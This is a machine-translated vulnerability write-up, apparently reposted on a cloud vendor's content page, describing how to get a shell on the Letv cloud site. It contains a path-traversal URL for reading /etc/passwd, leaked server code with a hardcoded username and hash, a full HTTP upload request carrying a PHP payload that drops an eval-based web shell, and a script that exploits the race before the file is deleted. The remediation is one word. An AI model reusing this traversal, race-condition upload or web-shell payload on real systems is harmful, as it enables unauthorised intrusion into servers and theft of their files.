Letv cloud main site getshell

Source: Internet
Author: User

Letv cloud main site getshell

The Leeco cloud main site can use getshell because of the design permission on the code.

Http://www.letvcloud.com/api/docdownload? Filename = .. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd can be downloaded from any file
 



Read this file www/Home/Lib/Action/VideoAction. class. php

Starting from line 1
 

} Else {// only supports jpeg upload $ max_file_size = 2000000; // The maximum size of the uploaded file is 2 MB. The unit is BYTEif ($ file ['type']! = 'Image/jpeg '& $ file ['type']! = 'Image/pjpeg ') {$ error_message = "<font color = 'red'> images can only be in jpg format! </Font> "; echo '<script> (function({{parent.doc ument. getElementById ("'. $ txtid. '"). innerHTML = "'. $ error_message. '";}) (); </script>'; exit;} if ($ max_file_size <$ file [" size "]) {$ error_message = "<font color = 'red'> the maximum file size should not exceed 2 MB! </Font> "; echo '<script> (function({{parent.doc ument. getElementById ("'. $ txtid. '"). innerHTML = "'. $ error_message. '";}) (); </script>'; exit ;}}$ dest_folder =" Public/img/"; if (! File_exists ($ dest_folder) {mkdir ($ dest_folder);} $ pinfo = pathinfo ($ file ['name']); $ newfilename = md5 (time ()). ". ". $ pinfo ['extension']; $ destination = $ dest_folder. $ newfilename; if (move_uploaded_file ($ filename, $ destination) {$ url =' http://upload.letvcdn.com:8000/single_upload_tool.php '; $ Data = array ("isphone" => "1", "username" => "isleju", "md5str" => "26f6c33c801913158424f7d3fbd6d0c3 ", "single_upload_submit" => "", "single_upload_file" => "@". realpath ($ destination), // change the file name to "single_upload_submit" => "OK"); $ urldatajson = uploadByCURL ($ data, $ url ); $ urldata = json_decode ($ urldatajson, true); unlink ($ destination );



Unlink the uploaded file. However, if you upload the file to another server in the middle, the time difference will be left.

Using this time difference, we can getshell

First package
 

POST /video/imgupload HTTP/1.1Host: www.letvcloud.comProxy-Connection: keep-aliveContent-Length: 450Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.letvcloud.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGFLdcAPyYpQq380JReferer: http://www.letvcloud.com/video/edit/videoid/8682339Accept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4Cookie: LETVCLOUDID=705140aba5a3dc13e1222394352ade2b; Hm_lvt_984e73b4d6ff5ece34ec3da984ece290=1418609297; Hm_lpvt_984e73b4d6ff5ece34ec3da984ece290=1418631122------WebKitFormBoundaryGFLdcAPyYpQq380JContent-Disposition: form-data; name="txtid"load_message------WebKitFormBoundaryGFLdcAPyYpQq380JContent-Disposition: form-data; name="headImg"headImg------WebKitFormBoundaryGFLdcAPyYpQq380JContent-Disposition: form-data; name="upfile"; filename="test§1§.php"Content-Type: image/jpeg<?php fputs(fopen('f.php','w'),'<?php eval($_POST[f])?>');?>------WebKitFormBoundaryGFLdcAPyYpQq380J--



If you open 20 threads and keep sending packets, PHP files are continuously generated and uploaded to other servers.

Use the following script
 

<?php$url="http://www.letvcloud.com/Public/img/".md5(time()).".php";echo $url;file_get_contents($url);php?>



Open a higher thread to send packets



Before the file is deleted, php accessing the uploaded file will write a new php file, resulting in getshell
 

 

Solution:

Filter
 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.